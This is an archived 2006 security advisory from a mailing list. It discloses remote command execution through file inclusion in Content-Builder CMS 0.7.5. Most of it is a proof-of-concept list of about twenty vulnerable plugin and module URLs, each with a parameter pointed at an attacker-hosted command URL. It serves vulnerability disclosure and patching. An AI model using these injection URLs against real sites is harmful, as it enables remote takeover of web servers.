| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <448C8EC3.1080402@autistici.org> Date: Sun, 11 Jun 2006 23:44:35 +0200 From: Federico Fazzi <federico@...istici.org> To: milw0rm-submit <submit@...w0rm.com>, secunia-vuln-report <vuln@...unia.com>, bugtraq@...urityfocus.com, securiteam <news@...uriteam.com> Subject: Content-Builder (CMS) 0.7.5, Remote command execution ----------------------------------------------------- Advisory id: FSA:012 Author: Federico Fazzi Date: 11/06/2006, 22:30 Sinthesis: Content-Builder (CMS) 0.7.5, Remote command execution Type: high Product: http://www.content-builder.de/ Patch: unavailable ----------------------------------------------------- 1) Description: vulnerables page: Multiple vulnerabilities, see poc. 2) Proof of concept: http://example/[cb_path]/cms/plugins/col_man/column.inc.php?lang_path=[cmd_url]/ http://example/[cb_path]/cms/plugins/poll/poll.inc.php?lang_path=[cmd_url]/ http://example/[cb_path]/cms/plugins/user_managment/usrPortrait.inc.php?lang_path=[cmd_url]/ http://example/[cb_path]/cms/plugins/user_managment/user.inc.php?lang_path=[cmd_url]/ http://example/[cb_path]/cms/plugins/media_manager/media.inc.php?lang_path=[cmd_url]/ http://example/[cb_path]/cms/plugins/events/permanent.eventMonth.inc.php?lang_path=[cmd_url]/ http://example/[cb_path]/cms/plugins/events/events.inc.php?lang_path=[cmd_url]/ http://example/[cb_path]/cms/plugins/newsletter2/newsletter.inc.php?lang_path=[cmd_url]/ http://example/[cb_path]/modules/guestbook/guestbook.inc.php?path[cb]=[cmd_url]/ http://example/[cb_path]/modules/shoutbox/shoutBox.php?path[cb]=[cmd_url]/ http://example/[cb_path]/modules/download/overview.inc.php?rel=[cmd_url]/ http://example/[cb_path]/modules/download/detailView.inc.php?rel=[cmd_url]/ http://example/[cb_path]/modules/sitemap/sitemap.inc.php?path[cb]=[cmd_url]/ http://example/[cb_path]/modules/article/fullarticle.inc.php?rel=[cmd_url]/ http://example/[cb_path]/modules/article/comments.inc.php?rel=[cmd_url]/ http://example/[cb_path]/modules/article2/overview.inc.php?rel=[cmd_url]/ http://example/[cb_path]/modules/article2/fullarticle.inc.php?rel=[cmd_url]/ http://example/[cb_path]/modules/article2/comments.inc.php?rel=[cmd_url]/ http://example/[cb_path]/modules/headline/headlineBox.php?rel=[cmd_url]/ http://example/[cb_path]/modules/headline/showHeadline.inc.php?rel=[cmd_url]/ (note: add a cmd url with final slash (/)) 3) Solution: sanitized all variables on all files.
Powered by blists - more mailing lists